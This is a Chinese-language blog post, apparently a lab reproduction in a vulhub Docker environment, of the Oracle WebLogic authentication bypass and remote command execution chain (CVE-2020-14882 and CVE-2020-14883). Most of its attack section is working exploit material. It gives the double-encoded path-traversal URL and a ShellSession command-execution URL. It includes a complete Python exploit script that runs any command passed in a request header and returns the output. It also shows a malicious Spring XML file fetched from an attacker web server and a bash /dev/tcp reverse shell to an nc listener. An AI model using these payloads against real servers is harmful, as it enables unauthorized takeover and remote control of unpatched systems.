weblogic許可權繞過/遠端命令執行漏洞復現(CVE-2020-14482、CVE-2020-14883)

luckyzmj發表於2020-12-03

0x01 漏洞簡介

Weblogic是Oracle公司推出的J2EE應用伺服器。在2020年10月的更新中,Oracle官方修復了兩個長亭科技安全研究員@voidfyoo 提交的安全漏洞,分別是CVE-2020-14882和CVE-2020-14883。

  • CVE-2020-14882:遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic 管理控制檯。
  • CVE-2020-14883:允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通過一個HTTP請求在遠端Weblogic伺服器上以未授權的任意使用者身份執行命令。

影響版本:

  • Weblogic : 10.3.6.0.0
  • Weblogic : 12.1.3.0.0
  • Weblogic : 12.2.1.3.0
  • Weblogic : 12.2.1.4.0
  • Weblogic : 14.1.1.0.0

0x02 漏洞環境

執行如下命令啟動一個Weblogic 12.2.1.3版本的伺服器:

cd vulhub/weblogic/CVE-2020-14882
sudo docker-compose up -d

啟動完成後,訪問http://your-ip:7001/console即可檢視到後臺登入頁面。

0x03 漏洞復現

1. weblogic許可權繞過(CVE-2020-14882)

攻擊者可以構造特殊請求的URL,即可未授權訪問到管理後臺頁面:

http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal

訪問後臺後是一個低許可權的使用者,無法安裝應用,也無法直接執行任意程式碼。

2. weblogic遠端命令執行(CVE-2020-14883)

結合 CVE-2020-14882 漏洞,遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console ,並在 WebLogic Server Console 執行任意程式碼。

這個漏洞一共有兩種利用方法:

第一種方法是通過com.tangosol.coherence.mvel2.sh.ShellSession
第二種方法是通過com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

2.1 第一種方法(weblogic 12.2.x 適用)

這個利用方法只能在Weblogic 12.2.1以上版本利用,因為10.3.6並不存在com.tangosol.coherence.mvel2.sh.ShellSession類。

2.1.1 GET請求方式(無回顯)

直接訪問如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession執行命令:

http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

執行docker-compose exec weblogic bash進入容器中,可見/tmp/success1已成功建立。

2.1.2 POST請求方式(有回顯)

執行命令如下:

python CVE-2020-14882_POST.py -u http://192.168.126.130:7001/ -c "uname -a"

指令碼原始碼如下:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: zhzyker
# from: https://github.com/zhzyker/vulmap
# from: https://github.com/zhzyker/exphub
import http.client
import requests
import sys
import argparse
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle='
            'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = '
            '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = '
            'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField'
            '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet'
            '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) '
            'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); '
            'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]'
            '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result '
            '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter'
            '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.'
            'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);'
            'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));'
            'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");')

def cve_2020_14882(url, cmd):
    payload = payload_cve_2020_14882_v12
    path = "/console/css/%252e%252e%252fconsole.portal"
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,'
                  'application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'cmd': cmd
    }
    try:
        request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False)
        print(request.text)
    except Exception as error:
        print("[-] Vuln Check Failed... ...")
        print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap")




if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882',
                                     usage='use "python %(prog)s --help" for more information',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-u", "--url",
                        dest="url",
                        help="target url (http://127.0.0.1:7001)"
                        )

    parser.add_argument("-c", "--cmd",
                        dest="cmd",
                        help="command"
                        )
    args = parser.parse_args()
    if not args.url or not args.cmd:
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://127.0.0.1:7001 -c whoami')
    cve_2020_14882(args.url, args.cmd)

2.2 第二種方法(weblogic 版本通用)

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一種更為通殺的方法,最早在CVE-2019-2725被提出,對於所有Weblogic版本均有效。

2.2.1 無回顯驗證

首先,我們需要構造一個XML檔案,並將其儲存在Weblogic可以訪問到的伺服器上,可以自行搭建一個web服務,例如http://192.168.31.66/rce.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然後通過如下URL,即可讓Weblogic載入這個XML,並執行其中的命令:

http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.31.66/rce.xml")

執行docker-compose exec weblogic bash進入容器中,可見/tmp/success2已成功建立。

2.2.2 反彈shell驗證

在攻擊者主機上啟動NC監聽埠

nc -lvp 7777

事先準備一臺web伺服器,放置惡意rce.xml檔案

將rce.xml中的執行命令改為如下示例:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/192.168.31.66/7777 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然後通過如下URL,即可讓Weblogic載入這個XML,並執行其中的命令:

http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.31.66/rce.xml")

在攻擊者主機上成功接收到反彈的shell

參考文章

  • https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md

相關文章